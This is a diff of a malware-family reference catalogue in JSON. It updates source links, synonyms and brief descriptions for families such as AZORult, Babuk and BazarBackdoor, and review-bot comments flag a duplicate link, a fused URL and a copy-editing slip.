- "https://www.uptycs.com/blog/warzone-rat-comes-with-uac-bypass-technique",
- "https://blog.team-cymru.com/2019/07/25/unmasking-ave_maria/",
- "https://securelist.com/apt-trends-report-q3-2020/99204/",
+ "https://www.youtube.com/watch?v=81fdvmGmRvM",
+ "https://blog.talosintelligence.com/2021/09/operation-armor-piercer.html",
 "https://resources.malwarebytes.com/files/2020/05/CTNT_Q1_2020_COVID-Report_Final.pdf",
 "https://medium.com/insomniacs/do-you-want-to-bake-a-donut-come-on-lets-go-update-go-away-maria-e8e2b33683b1",
 "https://reaqta.com/2019/04/ave_maria-malware-part1/",
- "https://research.checkpoint.com/2020/warzone-behind-the-enemy-lines/",
- "https://mp.weixin.qq.com/s/C09P0al1nhsyyujHRp0FAw",
- "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
 "http://blog.morphisec.com/threat-alert-ave-maria-infostealer-on-the-rise-with-new-stealthier-delivery",
 "https://www.youtube.com/watch?v=T0tdj1WDioM",
- "https://blog.yoroi.company/research/the-ave_maria-malware/",
- "https://blog.talosintelligence.com/2020/09/salfram-robbing-place-without-removing.html",
- "https://securelist.com/fin7-5-the-infamous-cybercrime-rig-fin7-continues-its-activities/90703/",
- "https://www.uptycs.com/blog/confucius-apt-deploys-warzone-rat",
+ "https://www.kaspersky.com/about/press-releases/2019_fin7-hacking-group-targets-more-than-130-companies-after-leaders-arrest",
+ "https://mp.weixin.qq.com/s/fsesosMnKIfAi_I9I0wKSA",
+ "https://blog.team-cymru.com/2019/07/25/unmasking-ave_maria/",
 "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html",
- "https://mp.weixin.qq.com/s/fsesosMnKIfAi_I9I0wKSA"
+ "https://www.uptycs.com/blog/warzone-rat-comes-with-uac-bypass-technique",
+ "https://www.youtube.com/watch?v=-G82xh9m4hc",
+ "https://www.trendmicro.com/en_us/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-ameri.html",
+ "https://blog.yoroi.company/research/the-ave_maria-malware/",
+ "https://mp.weixin.qq.com/s/C09P0al1nhsyyujHRp0FAw",
+ "https://securelist.com/apt-trends-report-q3-2020/99204/",
+ "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/",
+ "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf",
+ "https://blog.talosintelligence.com/2020/09/salfram-robbing-place-without-removing.html",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-american-entities-with-commodity-rats/BlindEagleIOCList.txt",
+ "https://www.trendmicro.com/en_us/research/21/i/Water-Basilisk-Uses-New-HCrypt-Variant-to-Flood-Victims-with-RAT-Payloads.html",
+ "https://securityintelligence.com/posts/roboski-global-recovery-automation/",
+ "https://research.checkpoint.com/2020/warzone-behind-the-enemy-lines/",
+ "https://blogs.quickheal.com/warzone-rat-beware-of-the-trojan-malware-stealing-data-triggering-from-various-office-documents/",
+ "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
+ "https://securelist.com/fin7-5-the-infamous-cybercrime-rig-fin7-continues-its-activities/90703/",
+ "https://www.uptycs.com/blog/confucius-apt-deploys-warzone-rat"
 ],
 "synonyms": [
 "AVE_MARIA",
@@ -8956,6 +10214,20 @@
 "uuid": "6bae792a-c2d0-42eb-b9e0-6ef1d83f9b25",
 "value": "Ave Maria"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.avos_locker",
+ "https://blog.malwarebytes.com/threat-analysis/2021/07/avoslocker-enters-the-ransomware-scene-asks-for-partners/",
+ "https://unit42.paloaltonetworks.com/emerging-ransomware-groups/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "8cee7a73-df5f-4ca3-ac52-b8a29a9b7414",
+ "value": "AvosLocker"
+ },
 {
 "description": "",
 "meta": {
@@ -8981,6 +10253,19 @@
 "uuid": "c84a6b0b-28a5-4293-b8fc-6a6eeb7b5f70",
 "value": "Ayegent"
 },
+ {
+ "description": "Keylogger.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.aytoke",
+ "https://snort.org/rule_docs/1-34217"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "91524400-097c-4584-9168-05b317d57b63",
+ "value": "Aytoke"
+ },
 {
 "description": "AZORult is a credential and payment card information stealer. Among other things, version 2 added support for .bit-domains. It has been observed in conjunction with Chthonic as well as being dropped by Ramnit.",
 "meta": {
@@ -8988,8 +10273,10 @@
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.azorult",
 "https://blog.360totalsecurity.com/en/bayworld-event-cyber-attack-against-foreign-trade-industry/",
 "https://blog.team-cymru.com/2020/02/19/azorult-what-we-see-using-our-own-tools/",
+ "https://yoroi.company/research/apt-or-not-apt-whats-behind-the-aggah-campaign/",
+ "https://community.riskiq.com/article/2a36a7d2/description",
 "https://medium.com/s2wlab/w1-feb-en-story-of-the-week-stealers-on-the-darkweb-49945a31601d",
- "https://medium.com/s2wlab/operation-synctrek-e5013df8d167",
+ "https://community.riskiq.com/article/56e28880",
 "https://mariohenkel.medium.com/decrypting-azorult-traffic-for-fun-and-profit-9f28d8638b05",
 "https://research.checkpoint.com/2019/select-code_execution-from-using-sqlite/",
 "https://umbrella.cisco.com/blog/navigating-cybersecurity-during-a-pandemic-latest-malware-and-threat-actors",
@@ -8997,6 +10284,7 @@
 "https://www.vmray.com/cyber-security-blog/azorult-delivered-by-guloader-malware-analysis-spotlight/",
 "https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware",
 "https://isc.sans.edu/diary/25120",
+ "https://ke-la.com/whats-dead-may-never-die-azorult-infostealer-decommissioned-again/",
 "https://blog.talosintelligence.com/2020/06/tor2mine-is-up-to-their-old-tricks-and_11.html",
 "https://www.youtube.com/watch?v=EyDiIAt__dI",
 "https://fr3d.hk/blog/gazorp-thieving-from-thieves",
@@ -9004,16 +10292,21 @@
 "https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/using-qiling-framework-to-unpack-ta505-packed-samples/",
 "https://malwarebreakdown.com/2017/07/24/the-seamless-campaign-drops-ramnit-follow-up-malware-azorult-stealer-smoke-loader-etc/",
 "https://blog.nviso.eu/2020/09/01/epic-manchego-atypical-maldoc-delivery-brings-flurry-of-infostealers/",
+ "https://yoroi.company/research/aggah-how-to-run-a-botnet-without-renting-a-server-for-more-than-a-year/",
 "https://twitter.com/DrStache_/status/1227662001247268864",
 "https://blog.yoroi.company/research/aggah-how-to-run-a-botnet-without-renting-a-server-for-more-than-a-year/",
+ "https://www.virusbulletin.com/uploads/pdf/magazine/2021/202104-design-vulnerabilities-azorult-cc-panels.pdf",
 "https://malwarebreakdown.com/2017/11/12/seamless-campaign-delivers-ramnit-via-rig-ek-at-188-225-82-158-follow-up-malware-is-azorult-stealer/",
 "https://resources.malwarebytes.com/files/2020/05/CTNT_Q1_2020_COVID-Report_Final.pdf",
 "https://research.checkpoint.com/the-emergence-of-the-new-azorult-3-3/",
 "https://unit42.paloaltonetworks.com/cybersquatting/",
 "https://threatvector.cylance.com/en_us/home/threat-spotlight-analyzing-azorult-infostealer-malware.html",
+ "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/",
 "https://blog.minerva-labs.com/puffstealer-evasion-in-a-cloak-of-multiple-layers",
+ "https://medium.com/s2wlab/operation-synctrek-e5013df8d167",
 "https://www.proofpoint.com/us/threat-insight/post/threat-actors-using-legitimate-paypal-accounts-to-distribute-chthonic-banking-trojan",
 "https://www.zscaler.com/blogs/research/multistage-freedom-loader-used-spread-azorult-and-nanocore-rat",
+ "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/",
 "https://securelist.com/azorult-analysis-history/89922/",
 "https://ke-la.com/exploring-the-genesis-supply-chain-for-fun-and-profit/",
"https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf",
@@ -9023,6 +10316,7 @@
 "https://blog.prevailion.com/2020/02/the-triune-threat-mastermana-returns.html",
 "https://www.cybereason.com/blog/the-hole-in-the-bucket-attackers-abuse-bitbucket-to-deliver-an-arsenal-of-malware",
 "https://blogs.blackberry.com/en/2020/04/threat-spotlight-gootkit-banking-trojan",
+ "https://securityintelligence.com/posts/roboski-global-recovery-automation/",
 "https://www.domaintools.com/resources/blog/identifying-network-infrastructure-related-to-a-who-spoofing-campaign",
 "http://www.vkremez.com/2017/07/lets-learn-reversing-credential-and.html",
 "https://maxkersten.nl/binary-analysis-course/malware-analysis/azorult-loader-stages/",
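Review bot: The added ref `https://yoroi.company/research/aggah-how-to-run-a-botnet-without-renting-a-server-for-more-than-a-year/` is the same article as the existing context line `https://blog.yoroi.company/research/aggah-how-to-run-a-botnet-without-renting-a-server-for-more-than-a-year/` two lines below, differing only in host, so the AZORult entry now lists one source twice. Keep whichever of the two URLs currently resolves and drop the other. The AZORult object whose refs this hunk extends starts before the hunk.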
@@ -9060,26 +10354,53 @@
 "value": "Babar"
 },
 {
- "description": "",
+ "description": "Babuk Ransomware is a sophisticated ransomware compiled for several platforms. Windows and ARM for Linux are the most used compiled versions, but ESX and a 32bit old PE executable were observed over time. as well It uses an Elliptic Curve Algorithm (Montgomery Algorithm) to build the encryption keys.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.babuk",
 "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-babuk-ransomware.pdf",
- "https://www.bleepingcomputer.com/news/security/babyk-ransomware-wont-hit-charities-unless-they-support-lgbt-blm/",
+ "https://www.zerofox.com/blog/babuk-ransomware-variant-delta-plus/",
 "https://sebdraven.medium.com/babuk-is-distributed-packed-78e2f5dd2e62",
- "https://twitter.com/Sebdraven/status/1346377590525845504",
- "http://chuongdong.com/reverse%20engineering/2021/01/03/BabukRansomware/",
+ "https://www.bleepingcomputer.com/news/security/data-leak-marketplaces-aim-to-take-over-the-extortion-economy/",
+ "https://www.bleepingcomputer.com/news/security/new-evil-corp-ransomware-mimics-payloadbin-gang-to-evade-us-sanctions/",
 "https://medium.com/s2wlab/w4-jan-en-story-of-the-week-ransomware-on-the-darkweb-7595544363b1",
- "https://www.trendmicro.com/en_us/research/21/b/new-in-ransomware.html"
+ "https://twitter.com/Sebdraven/status/1346377590525845504",
+ "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/",
+ "https://www.bleepingcomputer.com/news/security/babyk-ransomware-wont-hit-charities-unless-they-support-lgbt-blm/",
+ "https://www.bleepingcomputer.com/news/security/leaked-babuk-locker-ransomware-builder-used-in-new-attacks/",
+ "https://securelist.com/ransomware-world-in-2021/102169/",
+ "https://marcoramilli.com/2021/07/05/babuk-ransomware-the-builder/",
+ "https://www.advintel.io/post/groove-vs-babuk-groove-ransom-manifesto-ramp-underground-platform-secret-inner-workings",
+ "https://ke-la.com/new-russian-speaking-forum-a-new-place-for-raas/",
+ "https://sekurak.pl/udalo-nam-sie-zrealizowac-wywiad-z-grupa-ransomware-babuk-ktora-zaszyfrowala-policje-metropolitarna-w-waszyngtonie/",
+ "https://medium.com/s2wlab/grooves-thoughts-on-blackmatter-babuk-and-interruption-in-the-supply-of-cheese-in-the-b5328bc764f2",
+ "https://lab52.io/blog/quick-review-of-babuk-ransomware-builder/",
+ "https://medium.com/s2wlab/groove-x-ramp-the-relation-between-groove-babuk-ramp-and-blackmatter-f75644f8f92d",
+ "https://medium.com/s2wlab/w4-may-en-story-of-the-week-ransomware-on-the-darkweb-5f5b8d4c3b6f",
+ "http://chuongdong.com/reverse%20engineering/2021/01/03/BabukRansomware/",
+ "https://vulnerability.ch/2021/04/ransomware-and-date-leak-site-publication-time-analysis/",
+ "https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/how-groove-gang-is-shaking-up-the-ransomware-as-a-service-market-to-empower-affiliates/",
+ "https://www.trendmicro.com/en_us/research/21/b/new-in-ransomware.html",
+ "https://chuongdong.com/reverse%20engineering/2021/01/16/BabukRansomware-v3/",
+ "https://medium.com/s2wlab/blackmatter-x-babuk-using-the-same-web-server-for-sharing-leaked-files-d01c20a74751",
+ "https://therecord.media/builder-for-babuk-locker-ransomware-leaked-online/",
+ "https://medium.com/s2wlab/w1-jun-en-story-of-the-week-ransomware-on-the-darkweb-af491d33868b",
+ "https://www.databreaches.net/babuk-re-organizes-as-payload-bin-offers-its-first-leak/",
+ "https://twitter.com/GossiTheDog/status/1409117153182224386",
+ "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3",
+ "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/are-virtual-machines-the-new-gold-for-cyber-criminals/",
+ "https://www.bleepingcomputer.com/news/security/babuk-ransomware-is-back-uses-new-version-on-corporate-networks/",
+ "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-babuk-moving-to-vm-nix-systems.pdf",
+ "https://www.fr.sogeti.com/globalassets/france/avis-dexperts--livres-blancs/cybersecchronicles_-_babuk.pdf"
 ],
 "synonyms": [
- "Babyk Ransomware",
+ "Babyk",
 "Vasa Locker"
 ],
 "type": []
 },
 "uuid": "3e243686-a0a0-4aff-b149-786cc3f99a84",
- "value": "Babuk Ransomware"
+ "value": "Babuk (Windows)"
 },
 {
 "description": "",
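Review bot: The new Babuk description contains a broken sentence boundary, `observed over time. as well It uses an Elliptic Curve Algorithm`, which reads as a copy-edit leftover. Suggest `"description": "... but ESX and a 32bit old PE executable were observed over time as well. It uses an Elliptic Curve Algorithm (Montgomery Algorithm) to build the encryption keys."`. The uuid is unchanged while `value` moves from `Babuk Ransomware` to `Babuk (Windows)` and the synonym `Babyk Ransomware` becomes `Babyk`, so anything that keys on the old display name or synonym rather than the uuid may stop matching; a brief note in the commit message would help downstream users.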
@@ -9114,14 +10435,20 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.babyshark",
- "https://www.cybereason.com/blog/back-to-the-future-inside-the-kimsuky-kgh-spyware-suite",
+ "https://www.youtube.com/watch?v=rfzmHjZX70s",
+ "https://www.pwc.co.uk/issues/cyber-security-services/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-1.html",
 "https://blog.alyac.co.kr/3352",
+ "https://www.youtube.com/watch?v=Dv2_DK3tRgI",
+ "https://conference.hitb.org/hitbsecconf2021ams/materials/D2T1%20-%20The%20Phishermen%20-%20Dissecting%20Phishing%20Techniques%20of%20CloudDragon%20APT%20-%20Linda%20Kuo%20&Zih-Cing%20Liao%20.pdf",
 "https://www.pwc.co.uk/issues/cyber-security-data-privacy/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-2.html",
 "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
- "https://us-cert.cisa.gov/ncas/alerts/aa20-301a",
- "https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/",
- "https://twitter.com/i/web/status/1099147896950185985",
+ "https://www.cybereason.com/blog/back-to-the-future-inside-the-kimsuky-kgh-spyware-suite",
 "https://www.bloomberglaw.com/document/public/subdoc/X67FPNDOUBV9VOPS35A4864BFIU?imagename=1",
+ "https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/",
+ "https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries",
+ "https://i.blackhat.com/asia-21/Friday-Handouts/as-21-Kuo-We-Are-About-To-Land-How-CloudDragon-Turns-A-Nightmare-Into-Reality.pdf",
+ "https://twitter.com/i/web/status/1099147896950185985",
+ "https://us-cert.cisa.gov/ncas/alerts/aa20-301a",
 "https://www.pwc.co.uk/issues/cyber-security-services/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-1.htmlhttps://www.pwc.co.uk/issues/cyber-security-data-privacy/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-2.html"
],
 "synonyms": [],
@@ -9199,7 +10526,8 @@
 "https://www.cyberbit.com/backswap-banker-malware-hides-inside-replicas-of-legitimate-programs/",
 "https://www.cyberbit.com/blog/endpoint-security/backswap-banker-malware-hides-inside-replicas-of-legitimate-programs/",
 "https://www.fintechsecurity.com.hk/slides/01.Dmitry-Annual-Group-IB-report-High-Tech-Crime-Trends.pdf",
- "https://www.welivesecurity.com/2018/05/25/backswap-malware-empty-bank-accounts/"
+ "https://www.welivesecurity.com/2018/05/25/backswap-malware-empty-bank-accounts/",
+ "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree"
 ],
 "synonyms": [],
 "type": []
@@ -9248,6 +10576,20 @@
 "uuid": "1eceb5c0-3a01-43c2-b204-9957b15cf763",
 "value": "badflick"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.badhatch",
+ "https://www.bitdefender.com/files/News/CaseStudies/study/394/Bitdefender-PR-Whitepaper-BADHATCH-creat5237-en-EN.pdf",
+ "https://team-cymru.com/blog/2021/03/15/fin8-badhatch-threat-indicator-enrichment/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "8e8880bf-d016-4759-a138-2fdb4e54f9ab",
+ "value": "BADHATCH"
+ },
 {
 "description": "",
 "meta": {
@@ -9258,6 +10600,7 @@
 "http://blog.fortinet.com/2017/04/05/in-depth-look-at-new-variant-of-monsoon-apt-backdoor-part-2",
 "https://ti.qianxin.com/blog/articles/apt-c-09-reappeared-as-conflict-intensified-between-india-and-pakistan/",
 "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
+ "https://securelist.com/apt-trends-report-q1-2021/101967/",
 "https://www.forcepoint.com/sites/default/files/resources/files/forcepoint-security-labs-monsoon-analysis-report.pdf",
 "https://researchcenter.paloaltonetworks.com/2018/03/unit42-patchwork-continues-deliver-badnews-indian-subcontinent/",
 "https://www.virusbulletin.com/uploads/pdf/conference_slides/2019/VB2019-LunghiHorejsi.pdf",
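Review bot: The last context ref of the BabyShark entry is two URLs fused into one string (`...part-1.htmlhttps://www.pwc.co.uk/...part-2.html`), and this hunk adds the separate part-1 URL while leaving the fused line in place, so the entry now carries a broken link next to the correct ones. The part-2 URL is already listed on its own as well, so the fused line can simply be removed. The BabyShark object starts before this hunk.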
@@ -9387,10 +10730,12 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.bandook",
 "https://twitter.com/malwrhunterteam/status/796425285197561856",
- "https://research.checkpoint.com/2020/bandook-signed-delivered/",
- "https://www.eff.org/deeplinks/2020/12/dark-caracal-you-missed-spot",
 "https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf",
- "https://www.eff.org/files/2018/01/29/operation-manul.pdf"
+ "https://www.proofpoint.com/us/blog/threat-insight/new-threat-actor-uses-spanish-language-lures-distribute-seldom-observed-bandook",
+ "https://www.eff.org/deeplinks/2020/12/dark-caracal-you-missed-spot",
+ "https://research.checkpoint.com/2020/bandook-signed-delivered/",
+ "https://www.eff.org/files/2018/01/29/operation-manul.pdf",
+ "https://www.welivesecurity.com/2021/07/07/bandidos-at-large-spying-campaign-latin-america/"
 ],
 "synonyms": [
 "Bandok"
@@ -9487,7 +10832,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.batchwiper",
- "http://contagiodump.blogspot.com/2012/12/batchwiper-samples.html"
+ "http://contagiodump.blogspot.com/2012/12/batchwiper-samples.html",
+ "https://www.rewterz.com/rewterz-news/rewterz-threat-alert-common-raven-iocs"
 ],
 "synonyms": [],
 "type": []
@@ -9517,9 +10863,15 @@
 "https://github.com/ThreatConnect-Inc/research-team/blob/master/IOCs/WizardSpider-UNC1878-Ryuk.csv",
 "https://www.zscaler.com/blogs/research/spear-phishing-campaign-delivers-buer-and-bazar-malware",
 "https://cofense.com/blog/bazarbackdoor-stealthy-infiltration",
- "https://research.nccgroup.com/2020/06/02/in-depth-analysis-of-the-new-team9-malware-family/",
+ "https://www.trendmicro.com/en_us/research/21/d/a-spike-in-bazarcall-and-icedid-activity.html",
+ "https://www.advanced-intel.com/post/front-door-into-bazarbackdoor-stealthy-cybercrime-weapon",
+ "https://unit42.paloaltonetworks.com/bazarloader-malware/",
+ "https://johannesbader.ch/blog/a-bazarloader-dga-that-breaks-during-summer-months/",
 "https://www.proofpoint.com/us/blog/threat-insight/baza-valentines-day",
 "https://blog.fox-it.com/2020/06/02/in-depth-analysis-of-the-new-team9-malware-family/",
+ "https://www.bleepingcomputer.com/news/security/bazarbackdoor-sneaks-in-through-nested-rar-and-zip-archives/",
+ "https://twitter.com/Unit42_Intel/status/1421117403644186629?s=20",
+ "https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware",
 "https://medium.com/walmartglobaltech/nimar-loader-4f61c090c49e",
 "https://thedfirreport.com/2021/01/31/bazar-no-ryuk/",
 "https://thedfirreport.com/2020/10/08/ryuks-return/",
@@ -9529,21 +10881,35 @@
 "https://public.intel471.com/blog/trickbot-update-november-2020-bazar-loader-microsoft/",
 "https://www.crowdstrike.com/blog/wizard-spider-adversary-update/",
 "https://us-cert.cisa.gov/sites/default/files/publications/AA20-302A_Ransomware%20_Activity_Targeting_the_Healthcare_and_Public_Health_Sector.pdf",
+ "https://www.cybereason.com/hubfs/A%20Bazar%20of%20Tricks%20Following%20Team9%E2%80%99s%20Development%20Cycles%20IOCs.pdf",
 "https://unit42.paloaltonetworks.com/ryuk-ransomware/",
- "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
+ "https://news.sophos.com/en-us/2021/04/15/bazarloader-deploys-a-pair-of-novel-spam-vectors",
 "https://www.hornetsecurity.com/en/threat-research/bazarloader-campaign-with-fake-termination-emails/",
 "https://blog.minerva-labs.com/slamming-the-backdoor-on-bazarloader",
 "https://johannesbader.ch/blog/next-version-of-the-bazarloader-dga/",
 "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
 "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
+ "https://www.youtube.com/watch?v=uAkeXCYcl4Y",
+ "https://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/",
 "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/",
+ "https://www.zscaler.com/blogs/security-research/new-trickbot-and-bazarloader-campaigns-use-multiple-delivery-vectors",
+ "https://www.crowdstrike.com/blog/four-popular-defensive-evasion-techniques-in-2021/",
+ "https://www.microsoft.com/security/blog/2021/07/29/bazacall-phony-call-centers-lead-to-exfiltration-and-ransomware/",
 "https://thedfirreport.com/2020/11/05/ryuk-speed-run-2-hours-to-ransom/",
 "https://thedfirreport.com/2021/03/08/bazar-drops-the-anchor/",
 "https://www.fortinet.com/blog/threat-research/new-bazar-trojan-variant-is-being-spread-in-recent-phishing-campaign-part-I",
+ "https://isc.sans.edu/diary/27308",
+ "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf",
+ "https://research.nccgroup.com/2020/06/02/in-depth-analysis-of-the-new-team9-malware-family/",
 "https://www.vkremez.com/2020/04/lets-learn-trickbot-bazarbackdoor.html",
 "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-006.pdf",
 "https://www.fortinet.com/blog/threat-research/new-bazar-trojan-variant-is-being-spread-in-recent-phishing-campaign-part-II",
+ "https://fr3d.hk/blog/campo-loader-simple-but-effective",
+ "https://www.intel471.com/blog/Cobalt-strike-cybercriminals-trickbot-qbot-hancitor",
+ "https://mal-eats.net/en/2021/05/11/campo_new_attack_campaign_targeting_japan/",
 "https://www.domaintools.com/resources/blog/tracking-a-trickbot-related-ransomware-incident",
+ "https://thedfirreport.com/2021/08/01/bazarcall-to-conti-ransomware-via-trickbot-and-cobalt-strike/",
+ "https://mal-eats.net/2021/05/10/campo_new_attack_campaign_targeting_japan/",
 "https://twitter.com/anthomsec/status/1321865315513520128",
 "https://www.hhs.gov/sites/default/files/bazarloader.pdf",
 "https://www.hornetsecurity.com/en/threat-research/bazarloaders-elaborate-flower-shop-lure/",
@@ -9552,12 +10918,18 @@
 "https://cybersecurity.att.com/blogs/labs-research/trickbot-bazarloader-in-depth",
 "https://www.cybereason.com/blog/cybereason-vs.-ryuk-ransomware",
 "https://www.bleepingcomputer.com/news/security/bazarbackdoor-trickbot-gang-s-new-stealthy-network-hacking-malware/",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
+ "https://medium.com/walmartglobaltech/decrypting-bazarloader-strings-with-a-unicorn-15d2585272a9",
 "https://storage.pardot.com/652283/16118467480sqebwq7/MSP_Security_Summit___John_Hammond_Huntress___Analyzing_Ryuk.pdf",
 "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html",
 "https://www.scythe.io/library/threatthursday-ryuk",
- "https://www.advanced-intel.com/post/front-door-into-bazarbackdoor-stealthy-cybercrime-weapon",
+ "https://thedfirreport.com/2021/09/13/bazarloader-to-conti-ransomware-in-32-hours/",
+ "https://intel471.com/blog/ettersilent-maldoc-builder-macro-trickbot-qbot/",
+ "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
+ "https://www.mandiant.com/resources/fin12-ransomware-intrusion-actor-pursuing-healthcare-targets",
 "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
 "https://www.gosecure.net/blog/2021/02/01/bazarloader-mocks-researchers-in-december-2020-malspam-campaign/",
+ "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
 "https://www.cybereason.com/blog/a-bazar-of-tricks-following-team9s-development-cycles",
 "https://cofense.com/the-ryuk-threat-why-bazarbackdoor-matters-most/",
 "https://www.trendmicro.com/vinfo/hk-en/security/news/cybercrime-and-digital-threats/group-behind-trickbot-spreads-fileless-bazarbackdoor",
@@ -9566,10 +10938,10 @@
 ],
 "synonyms": [
 "BEERBOT",
- "BazarCall",
 "KEGTAP",
 "Team9Backdoor",
- "bazaloader"
+ "bazaloader",
+ "bazarloader"
 ],
 "type": []
 },
@@ -9581,11 +10953,17 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.bazarnimrod",
+ "https://umbrella.cisco.com/blog/cybersecurity-threat-spotlight-backdoors-rats-loaders-evasion-techniques",
+ "https://medium.com/walmartglobaltech/investigation-into-the-state-of-nim-malware-14cc543af811",
+ "https://www.proofpoint.com/us/blog/threat-insight/nimzaloader-ta800s-new-initial-access-malware",
 "https://twitter.com/James_inthe_box/status/1357009652857196546",
 "https://medium.com/walmartglobaltech/nimar-loader-4f61c090c49e",
- "https://medium.com/walmartglobaltech/investigation-into-the-state-of-nim-malware-14cc543af811"
+ "https://www.healthcareinfosecurity.com/spear-phishing-campaign-distributes-nim-based-malware-a-16176",
+ "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-old-dogs-new-tricks.pdf"
+ ],
+ "synonyms": [
+ "NimzaLoader"
 ],
- "synonyms": [],
 "type": []
 },
 "uuid": "1735a331-9ca9-49b6-a5aa-0ddac9db8de6",
@@ -9741,9 +11119,10 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.betabot",
- "https://www.cybereason.com/blog/betabot-banking-trojan-neurevt",
+ "https://securelist.com/financial-cyberthreats-in-2020/101638/",
 "https://medium.com/@woj_ciech/betabot-still-alive-with-multi-stage-packing-fbe8ef211d39",
 "https://www.ccn-cert.cni.es/seguridad-al-dia/comunicados-ccn-cert/6087-betabot-y-fleercivet-dos-nuevos-informes-de-codigo-danino-del-ccn-cert.html",
+ "https://www.cybereason.com/blog/betabot-banking-trojan-neurevt",
 "http://www.xylibox.com/2015/04/betabot-retrospective.html",
 "https://news.sophos.com/en-us/2020/05/14/raticate/",
 "http://resources.infosecinstitute.com/beta-bot-analysis-part-1/#gref",
@@ -9870,6 +11249,19 @@
 "uuid": "04803315-fc17-44d0-839e-534b9da4c7fc",
 "value": "bioload"
 },
+ {
+ "description": "BIOPASS RAT is a malware family which targets online gambling companies in China by leveraging a watering hole attack. This Remote Access Trojan (RAT) is unique in that it leverages the Open Broadcaster Software (OBS) framework to monitor the user's screen.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.biopass",
+ "https://www.trendmicro.com/en_us/research/21/g/biopass-rat-new-malware-sniffs-victims-via-live-streaming.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "f3cdfef4-7976-42f9-8b5e-a67d4a62b5c1",
+ "value": "BIOPASS"
+ },
 {
 "description": "",
 "meta": {
@@ -9891,7 +11283,10 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.bistromath",
 "https://labs.sentinelone.com/dprk-hidden-cobra-update-north-korean-malicious-cyber-activity/",
- "https://www.us-cert.gov/ncas/analysis-reports/ar20-045a"
+ "https://www.us-cert.gov/ncas/analysis-reports/ar20-045a",
